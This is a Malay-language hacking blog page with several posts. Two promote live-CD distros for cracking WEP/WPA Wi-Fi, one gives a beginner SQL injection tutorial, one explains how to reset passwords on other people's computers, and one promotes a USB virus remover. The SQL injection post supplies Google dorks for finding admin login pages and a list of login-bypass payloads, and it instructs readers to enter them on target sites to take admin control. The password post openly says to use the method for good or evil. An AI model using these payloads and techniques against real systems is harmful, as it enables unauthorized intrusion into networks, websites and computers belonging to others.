Popular Post

Wifislax : Wireless Hacking Live CD

By : Trilogy
Seperti biasa Franz rajin berjalan-jalan di dunia siber dan pada masa berjalan-jalan itulah Franz akan selalu berjumpa dengan benda-benda yang menarik untuk dikongsikan bersama dengan para pembaca semua. Boring nak dengar intro? Haha! Ok-ok..Jom kita teruskan dengan isi entri..

Apa Itu Wifislax?

Perkara pertama yang Franz nak anda tahu, Franz bukanlah peminat distro Linux yang bernama Slax, kerana bagi Franz, itulah distro yang paling tak boleh 'blah' sekali. A lot of epic phail!
Tapi lepas kenal dengan Wifislax, Franz mula suka dengan sistem operasi Linux yang boleh dimasukkan ke dalam poket ni. Err.. Ye lah.. poket! Teruskan membaca..
Wifislax ialah sebuah sistem operasi Linux (Linux Operating System) berasaskan Slax, sebuah sistem operasi Linux yang digelar 'sistem operasi poket' kerana saiznya yang kecil dan boleh dibuat Live Boot dari USB Pendrive atau CD sahaja. Cuma Wifislax dibuat dengan tujuan untuk melakukan ujian-ujian penembusan (penetration distribution distro) dan penggodaman WEP Wireless.

Beberapa paparan skrin yang diperolehi dari wifislax.com:



Cara menggunakannya amat senang.

1. Anda hanya perlu rakam (burn) imej ISO yang telah dimuat turun melalui laman web rasmi distro ini dengan menggunakan Unetbootin ke dalam Pendrive.

2. Tukarkan Boot Order yang pertama melalui BIOS Settings kepada USB

3. Reboot

4. Sebelum keluar lambang Windows (atau GRUB Linux, jika anda menggunakan Linux), tekan kekunci esc, atau F12, F10, atau mana-mana kekunci yang akan membawa anda kepada pilihan tetapan boot.

5. Pilih Pendrive anda (Kingston ke, Winston ke, Dunhill ke..Haha! Jenama Pendrive sendiri, sendiri mau ingat la!)

6. Anda akan di bawa ke dalam alam barzakh sistem operasi Wifislax.

7. Tahniah. Anda sudah boleh mula menggunakannya. Terdapat banyak WiFi Hacking Tools di dalam yang boleh dicuba satu demi satu. Kalau dah berjaya menggodam kata laluan WEP yang anda kehendaki, sila reboot semula ke dalam sistem operasi lalai (default) anda sama ada Windows, Linux, Mac OS X..ahhh..tak kisah lah.. Dah reboot apa lagi..Guna la WEP key tu! Pastikan salin dulu ok!

Untuk pengetahuan anda, distro ini telah dibuat oleh para penulis-penulis distro dari Sepanyol, oleh itu bahasa dalam tu memang tunggang dengan cermat langgang dengan bahasa Sepanyol. Jika anda mahu menukarkannya kepada bahasa Inggeris, silalah terokai sendiri. Sebab Mr.Hac sendiri pun tak sempat nak teroka habis! Hahah! Maaflah ya!

Apapun Franz boleh mengesyorkan kepada anda untuk mencuba Wifislax. Tak rugi sebab boleh bawa ke mana-mana dalam pendrive bersaiz minima 1GB kalau tak silap, dan yang paling penting ianya bersifat 'ringan' dan pantas. Tidak banyak menggunakan RAM, menjimatkan bateri...ahhh..Cuba sendiri la! Cakap banyak tak guna kan?
Blaze it bro! Blaze it up and good luck!

Anda boleh muat turun dan membaca mengenai Wifislax
melalui laman web rasminya di sini -> Wifislax

Wifiway : Hack WEP/WPA Dengan Lebih Mudah

By : Trilogy
Salam semua. Sebelum bagi intro panjang-panjang apa kata anda baca dulu entri mengenai Wifislax
di sini -> Wifislax

Apa Itu Wifiway?

Wifiway ialah sistem operasi Linux berasaskan Wifislax. Ibarat anak dia la! Namun ia telah berevolusi dengan banyak dan sangat pantas, dari versi 1.0 sehinggalah versi terkini ketika entri ini ditulis iaitu 2.0.3, ia telah meletakkan satu tanda aras dalam distro untuk penggodaman WEP dan WPA. Untuk versi 2.0.3, para penulis dan pembangun sistem operasi ini telah menaiktaraf pelbagai perisian seperti 'airoscript' dengan mode 'auto crack' yang memberikan kita kuasa untuk melakukan ujian penembusan terhadap sambungan tanpa wayar yang berhampiran dengan kita, dan ia dilakukan secara automatik penuh!

Seperti Wifislax, ia dipaparkan dalam bahasa Sepanyol secara lalai (default). Untuk menukarnya kepada bahasa Inggeris, sila ikuti tutorial dalam video ini -> Wifiway English Settings

Anda boleh memuat turun Wifiway melalui salah satu pautan di bawah:

1. Mirror 1

2. Mirror 2

Asas SQL-i Tutorial 1

By : Trilogy




Mari kita belajar asas SQLi sama- sama. Janjang edit sikit ayat ikut cite rasa sendiri. Banyak nak kena kredit ni. Yela, Janjang pon baru belajar juga, jadi kenalah cari rujukan banyak terutama kepada KenaHack dan beberapa forum komuniti hacker.


SQL Injection ( SQLi Tutorial )

5 perkara yang anda perlu tahu tentang SQLi

- Asas injection
- Mendapatkan Data
- Keluarkan Data
- Kumpul Maklumat
- Kumpul Data


Asas Injection

Mula-mula kita perlu pahamkan atau gambarkan dulu apa yang sebenarnya dan bagaimana SQLi ini dilakukan. Cuba baca ringkasan yang ade dibawah sebelum kita mulakan langkah pertama menggunakan SQLi.

- Cara mudah mengesan laman yang menggunakan sql ialah jika diperhatikan pada URL ( alamat web ) , ianya mempunyai perimeter id= seperti :

http://www.contoh.my/index.php?id=1

"index.php" merupakan nama file dan "id=1" merupakan perimeter bagi sesuatu info pada laman tersebut.

- Didalam SQL ia diperintah dengan menggunakan perintah :


$result = $db -> query ("SELECT * FROM `content` WHERE id=" . $_GET
['id']);
dan kebiasaanya laman akan diperintahkan melalui :

SELECT * FROM `content` WHERE id=1

- Ini akan membolehkannya disuntik ( inject ) pada perimeter id=1 . Contohnya :

http://www.contoh.my/index.php?id=1'

- Maka anda akan perhatikan keluar error seperti :

Fatal error: Call to a member function fetch_row() on a non-object in
/home/sites/contoh.my/public_html/index.php on line 50

- Namunpun begitu , bukan semua laman akan mengeluarkan error jenis ini, jika anda perhatikan perbezaan laman sebelum dan selepas di inject , maka ia berpotensi di inject.

Okaylah, mari kita mulakan langkah pertama untuk SQLi.


Memintas login admin

Mendapatkan kuasa admin dengan cara memintas akaun admin.

Seperti yang semua tahu , jika ingin melakukan SQL injection , semestinya laman tersebut menggunakan Database. Ini kerana melalui injection sql ini adalah untuk mendapatkan maklumat melalui database tersebut.

Kebiasaannya site yang berpotensi adalah yang berformat *.asp dan *.php.

Mula-mula sekali, kita perlu cari laman sasaran.

Cara yang biasa digunakan untuk mendapatkan sasaran ialah menggunakan google dork.Apakah Dork? Sila klik untuk lihat post sebelum ini.

Kalau nak diikutkan senarai google dork ni terlalu besar bagi kegunaan asas SQLi. Bagaimanapon ini yang paling mudah dan terbaik;

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Sekarang ape yang kite perlu buat setelah dapat sasaran?
Sasaran akan memberi kandungan paparan seperti ini:


ADMIN USERNAME :
PASSWORD :
jadi ape yang perlu kita buat adalah biasanya kita akan taip “Admin” pada ruang username. Dan pada ruang password kita akan taip SQLi kita.

Ini senarai SQLi:


' or '1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Jadi apa yang perlu anda taip adalah seperti ini.


username:Admin
password:'or'1'='1

ini akan buat system sql pada sasaran menjadi bingung dan akan memerikan akan kuasa penuh keatas website sasaran kepada anda sebagai admin.

Jika website sasaran anda lemah dan mudah terjejas, anda akan dapat kuasa penuh admin padanya.

Kita sambung lagi dalam siri seterusnya nanti. Cuba pahamkan konsep sqli ni.
Untuk siri akan datang, insyaAllah Janjang akan selitkan beberapa screenshot untuk rujukan anda.

Pecahkan Passwords Komputer / Laptop Orang Lain

By : Trilogy




Sediakan Alatan Ini :
-Unetbootin
-ResetWindowsPasswords
Dapatkan Alatan Tersebut : Di Sini

1) Download software untuk burn ke dalam pendrive.
eg : Unetbootin

2) Sediakan satu pendrive kosong.

3) Buka unetbootin, dan burn software yang boleh pecahkan password windows tu ke dalam pendrive.

4) Pergi ke komputer yang hendak dipecahkan passwordnya, cucuk pendrive. Start PC, dan masuk ke boot menu.

5) Nanti akan keluar satu interface yang membolehkan anda menghilangkan passwords atau menukarnya mengikut kemahuan anda.

Note :
# Guna lah untuk tujuan apa sekali pun, jahat atau baik. Ikut diri sendiri, aku tak mampu nak suruh korg ikut cakap aku.
# Jangan sesekali berkongsi software ini kepada umum tanpa pengetahuan aku.
# Nantikan Update Daripada Kami !

Virus Shortcut Remover Tool V3.1 UiTM

By : Trilogy
Salam...

Menyampah tak tengok ada shortcut-shortcut hidden dalam hard disk atau pendrive?
Bila di klik kosong.
Delete tak boleh,scan guna anti virus pun masih ada lagikan?
kalau hilang pun hilang kejap.
Lepas shutdown atau remove pendrive,on balik,cucuk balik pendrive masih ade lagi virus shortcut ni kan?hehehe..kesian...hahaha
Biasanya folder-folder shortcut ini bersaiz 2 kb hingga 8 kb.


Maka dengan sebab itu lahirlah seorang anak Malaysia pelajar dari UiTM menghasilkan
virus remover tool ini.

Tool ini telah diguna pakai dengan meluas di negara ini dan tidak terkecuali/hairan juga telah diguna pakai oleh seluruh dunia.



---Mudah saja nak guna tool ini.Cuma perlu download disini dan kemudian klik saja fail itu




---Pilih sama ada mahu buang virus di Pen drive atau Computer






 ---Lepas itu pilih mana-mana device yang mahu di bersihkan kerana ini untuk Pen drive.
Tekan scan dan delete semuanya





---Yang ini pula jika pilih PC.Tekan scan dan delete semuanya. Selesai


**Jika masih ada lagi yang tidak dapat di buang,cuba run tool ini dalam keadaan Safe Mode.**


Perasaan bangga tu muncul apabila kali pertama mencuba sendiri tool ini.
Anak Malaysia yang menghasilkanya mana tak bangga kan?

Nak tahu sape yang cipta tool ni?
klik Help pada muka hadapan tool ini.
klik pula pada about.

- Copyright © Franz Creation - Date A Live - Powered by Blogger - Designed by Johanes Djogan -